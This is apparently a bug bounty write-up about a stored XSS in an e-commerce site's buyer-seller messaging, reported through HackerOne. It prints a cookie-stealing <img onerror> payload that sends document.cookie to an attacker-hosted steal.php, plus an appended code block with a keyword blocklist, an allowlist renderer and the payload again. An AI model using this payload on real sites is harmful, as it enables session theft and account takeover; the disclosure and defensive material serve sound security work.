Today, I’m gonna share my story of an interesting XSS that I found on the same website, “redacted.com”. Since it was an e-commerce website, it had a feature where buyers and sellers could contact each other by sending messages. It seemed interesting to me and I decided to test it for XSS.
I made two accounts, one as a buyer and another as a seller. I started by sending “<>” to my seller’s account to see whether these tags were being HTML encoded or not. To my surprise, the filter didn’t encode them. I decided to use the most powerful payload of all time,
As I typed the complete payload in the text box, an alert popped up. I was happy.
My Mind: Oh! That was a piece of cake.
As I clicked send, BOOM! I got an error. I wondered why that had happened. I thought it was some client-side filter preventing the XSS payload from being sent. I tried to bypass the client-side filter using Burp Suite, but hard luck! Then I tried sending <script> and alert() separately to see what exactly the filter was blocking. It didn’t allow me to send either. I tried using prompt() instead of alert() to bypass the filter, but again, hard luck. I moved on to hex encoding it, and this time I succeeded: I escaped the filter using hex encoding. I made another payload, hoping for success this time.
YES! It escaped the filter! I quickly went to my seller’s account to see if I got an alert there.
Wait! What? No alert there. I checked the source and saw that the “onerror=[hex encoded payload]” part had been truncated; only <img src=x> was left. I was like:
I tried every possible way to trigger an alert but had no success at all. The filter was working far better than I expected. It was becoming really frustrating, since almost everything needed to pop up an alert was being filtered. I really lost hope of getting XSS there. The alert that popped up when I typed the payload in the text box was also of no use, since it was a Self Reflected XSS. I decided to take a break and go out for a walk.
My fate to my mind:
While walking, I kept thinking about it. It was time to think outside the box, since I had tried every possible way inside the box. Suddenly a thought came to my mind: what the hell was I going to do with an alert, since an alert is just a confirmation? Instead of trying to trigger an alert, I should actually try to demonstrate its impact. At the same time, an alert went off in my mind: <img src=x> had survived when I sent the hex-encoded payload. That stuck in my mind.
I came back with renewed hope and tried sending <img src=x> to check whether it worked. Yes, it worked. I quickly replaced x with a valid URL and saw that the image rendered in the seller’s message box. At that point I was no longer interested in triggering an alert at all. I decided to demonstrate how an attacker could steal the cookies of sellers and other buyers using it. I went to my text editor, wrote a few lines of PHP to steal cookies, and uploaded it to a free web host.
I built my final payload to request the PHP script I had uploaded to the web host, so that I could steal the seller’s cookies.
<img src=x onerror="this.src='https://[your-webhosting]/steal.php?cookie='+document.cookie">
I quickly switched to my seller’s account and YES! The payload finally worked. I got the cookies! I tried to perform actions on behalf of the seller by replacing the cookies and WOAH! It worked.
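Added example (not code from the original post or the site): it reconstructs the kind of keyword blocklist the write-up describes, shows that the final <img onerror> payload passes it, and contrasts it with an allowlist renderer that keeps the messaging feature’s image support while escaping everything else. The blocklist patterns and the placeholder host webhosting.example are assumptions.

```javascript
// The post describes a filter that rejected "<script", "alert(" and "prompt(".
// This blocklist is a reconstruction of that behaviour, not the site's code.
const BLOCKED = [/<script/i, /\balert\s*\(/i, /\bprompt\s*\(/i];
function blocklistFilter(message) {
  return !BLOCKED.some((re) => re.test(message));
}

// Contextual output encoding for the HTML body context.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Allowlist renderer: the only markup a message may carry is <img src="https://...">.
// Every other attribute (onerror included) is dropped, and all other text is escaped.
const IMG_TAG = /<img\b[^>]*>/gi;
const SRC_ATTR = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
function renderMessage(message) {
  let out = "";
  let last = 0;
  for (const m of message.matchAll(IMG_TAG)) {
    out += escapeHtml(message.slice(last, m.index));
    const src = SRC_ATTR.exec(m[0]);
    const url = src ? (src[1] ?? src[2] ?? src[3]) : null;
    let ok = false;
    try { ok = url !== null && new URL(url).protocol === "https:"; } catch (_) {}
    // Re-emit only the vetted src attribute; the original tag text is never reused.
    out += ok ? `<img src="${escapeHtml(url)}">` : escapeHtml(m[0]);
    last = m.index + m[0].length;
  }
  return out + escapeHtml(message.slice(last));
}

// Constructed sample: the write-up's final payload with a placeholder host.
const PAYLOAD =
  '<img src=x onerror="this.src=\'https://webhosting.example/steal.php?cookie=\'+document.cookie">';
```

Independently of the renderer, marking the session cookie HttpOnly keeps document.cookie from exposing it, which is what turned this injection into account takeover.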
I was like:
- June 03: Reported it to the HackerOne Team.
- June 03: Triaged
- Severity: High (8.1)
- Bounty: Still Waiting xD